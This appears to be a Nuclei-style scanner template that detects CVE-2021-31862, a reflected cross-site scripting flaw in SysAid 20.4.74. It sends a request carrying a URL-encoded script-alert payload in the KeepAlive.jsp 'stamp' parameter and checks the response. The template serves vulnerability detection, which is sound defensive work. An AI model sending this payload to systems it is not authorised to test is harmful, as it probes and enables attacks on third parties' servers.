id: CVE-2021-31862 info: name: SysAid - Reflected XSS author: jas37 severity: medium description: SysAid 20.4.74 allows XSS via the KeepAlive.jsp stamp parameter without any authentication. reference: - https://github.com/RobertDra/CVE-2021-31862/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2021-31862 - https://www.sysaid.com/product/on-premise/latest-release classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-31862 cwe-id: CWE-79 tags: cve,cve2021,xss,sysaid requests: - method: GET path: - '{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E' matchers: - type: dsl dsl: - '(body == "false ")' - 'status_code == 200' condition: and